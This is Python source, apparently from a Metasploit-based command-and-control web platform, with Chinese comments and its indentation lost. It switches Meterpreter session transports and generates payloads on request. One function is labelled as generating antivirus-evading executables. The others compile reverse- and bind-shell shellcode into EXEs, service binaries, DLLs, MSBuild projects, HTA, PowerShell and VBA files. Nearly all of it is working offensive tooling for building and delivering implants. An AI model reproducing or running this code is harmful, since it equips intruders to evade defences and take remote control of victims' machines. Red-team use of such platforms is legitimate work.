def update(sessionid=None, action=None, sleep=0):
if sessionid is None or sessionid <= 0:
context = data_return(306, TRANSPORT_MSG.get(306), {})
return context
if action == "next":
result_flag = RpcClient.call(
Method.SessionMeterpreterTransportNext, [sessionid])
elif action == "prev":
result_flag = RpcClient.call(
Method.SessionMeterpreterTransportPrev, [sessionid])
elif action == "sleep":
result_flag = RpcClient.call(
Method.SessionMeterpreterTransportSleep, [sessionid, sleep])
if result_flag:
reconnect_time = time.time() + sleep
Notice.send_warn(
f'切换Session到休眠 SID:{sessionid} 重连时间: {time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(reconnect_time))}'
)
context = data_return(203, TRANSPORT_MSG.get(203), {})
return context
else:
context = data_return(305, TRANSPORT_MSG.get(305), [])
return context
else:
result_flag = False
if result_flag:
Notice.send_info(f"切换传输完成 SID:{sessionid}")
context = data_return(202, TRANSPORT_MSG.get(202), {})
return context
else:
context = data_return(302, TRANSPORT_MSG.get(302), [])
return context
def generate_bypass_exe(mname=None, opts=None):
"生成免杀的exe"
# 处理RHOST及LHOST参数
if mname.find("reverse") > 0:
try:
opts.pop('RHOST')
except Exception as _:
pass
elif mname.find("bind") > 0:
try:
opts.pop('LHOST')
except Exception as _:
pass
# 处理OverrideRequestHost参数
if opts.get('OverrideRequestHost') is True:
opts["LHOST"] = opts['OverrideLHOST']
opts["LPORT"] = opts['OverrideLPORT']
opts['OverrideRequestHost'] = False
Notice.send_warn("Payload包含OverrideRequestHost参数")
Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")
# EXTENSIONS参数
if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
opts['EXTENSIONS'] = 'stdapi'
opts["Format"] = "hex"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
return None
shellcode = base64.b64decode(result.get('payload'))
byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode)
return byteresult
def generate_shellcode(mname=None, opts=None):
"""根据配置生成shellcode"""
# 处理RHOST及LHOST参数
if mname.find("reverse") > 0:
try:
opts.pop('RHOST')
except Exception as _:
pass
elif mname.find("bind") > 0:
try:
opts.pop('LHOST')
except Exception as _:
pass
# 处理OverrideRequestHost参数
if opts.get('OverrideRequestHost') is True:
opts["LHOST"] = opts['OverrideLHOST']
opts["LPORT"] = opts['OverrideLPORT']
Notice.send_warn("Payload包含OverrideRequestHost参数")
Notice.send_warn(
f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
Notice.send_warn(
f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")
# EXTENSIONS参数
if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
opts['EXTENSIONS'] = 'stdapi'
opts["Format"] = 'raw'
if "windows" in mname:
opts["Format"] = 'raw'
elif "linux" in mname:
opts["Format"] = 'raw'
elif "java" in mname:
opts["Format"] = 'jar'
elif "python" in mname:
opts["Format"] = 'py'
elif "php" in mname:
opts["Format"] = 'raw'
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
return result
byteresult = base64.b64decode(result.get('payload'))
return byteresult
def create(mname=None, opts=None):
"""生成payload文件"""
# badchars = opts['BadChars'] | | ''
# fmt = opts['Format'] | | 'raw'
# force = opts['ForceEncode'] | | false
# template = opts['Template'] | | nil
# plat = opts['Platform'] | | nil
# keep = opts['KeepTemplateWorking'] | | false
# force = opts['ForceEncode'] | | false
# sled_size = opts['NopSledSize'].to_i | | 0
# iter = opts['Iterations'].to_i | | 0
# 清理历史文件
Payload._destroy_old_files()
# 处理RHOST及LHOST参数
if mname.find("reverse") > 0:
try:
opts.pop('RHOST')
except Exception as _:
pass
elif mname.find("bind") > 0:
try:
opts.pop('LHOST')
except Exception as _:
pass
# 处理OverrideRequestHost参数
if opts.get('OverrideRequestHost') is True:
opts["LHOST"] = opts['OverrideLHOST']
opts["LPORT"] = opts['OverrideLPORT']
opts['OverrideRequestHost'] = False
Notice.send_warn("Payload包含OverrideRequestHost参数")
Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")
# EXTENSIONS参数
if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
opts['EXTENSIONS'] = 'stdapi'
if opts.get("Format") == "AUTO":
if "windows" in mname:
opts["Format"] = 'exe-src'
elif "linux" in mname:
opts["Format"] = 'elf'
elif "java" in mname:
opts["Format"] = 'jar'
elif "python" in mname:
opts["Format"] = 'py'
elif "php" in mname:
opts["Format"] = 'raw'
else:
context = data_return(306, Payload_MSG.get(306), {})
return context
if opts.get("Format") in ["exe-diy", "dll-diy", "dll-mutex-diy", "elf-diy"]:
# 生成原始payload
tmp_type = opts.get("Format")
opts["Format"] = "hex"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload'))
filename = Payload._create_payload_with_loader(mname, byteresult, payload_type=tmp_type)
# 读取新的zip文件内容
payloadfile = os.path.join(File.tmp_dir(), filename)
if opts.get("HandlerName") is not None:
filename = f"{opts.get('HandlerName')}_{filename}"
byteresult = open(payloadfile, 'rb')
elif opts.get("Format") == "msbuild":
# 生成原始payload
opts["Format"] = "csharp"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload'))
filename = Payload._create_payload_use_msbuild(mname, byteresult)
# 读取新的zip文件内容
payloadfile = os.path.join(File.tmp_dir(), filename)
byteresult = open(payloadfile, 'rb')
elif opts.get("Format") == "exe-src":
opts["Format"] = "hex"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload'))
byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=byteresult)
filename = "{}.exe".format(int(time.time()))
elif opts.get("Format") == "exe-src-service":
opts["Format"] = "hex"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload')) # result为None会抛异常
byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=byteresult,
payload_type="REVERSE_HEX_AS_SERVICE")
filename = "{}.exe".format(int(time.time()))
else:
file_suffix = {
"c": "c",
"csharp": "cs",
"exe": "exe",
"exe-service": "exe",
"powershell": "ps1",
"psh-reflection": "ps1",
"psh-cmd": "ps1",
"hex": "hex",
"hta-psh": "hta",
"raw": "raw",
"vba": "vba",
"vbscript": "vbs",
"elf": None,
"elf-so": "so",
"jar": "jar",
"java": "java",
"war": "war",
"python": "py",
"py": "py",
"python-reflection": "py",
}
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload'))
if file_suffix.get(opts.get("Format")) is None:
filename = "{}".format(int(time.time()))
else:
filename = "{}.{}".format(int(time.time()), file_suffix.get(opts.get("Format")))
response = HttpResponse(byteresult)
response['Content-Type'] = 'application/octet-stream'
response['Code'] = 200
response['Message'] = parse.quote(Payload_MSG.get(201))
# 中文特殊处理
urlpart = parse.quote(os.path.splitext(filename)[0], 'utf-8')
leftpart = os.path.splitext(filename)[-1]
response['Content-Disposition'] = f"{urlpart}{leftpart}"
return response
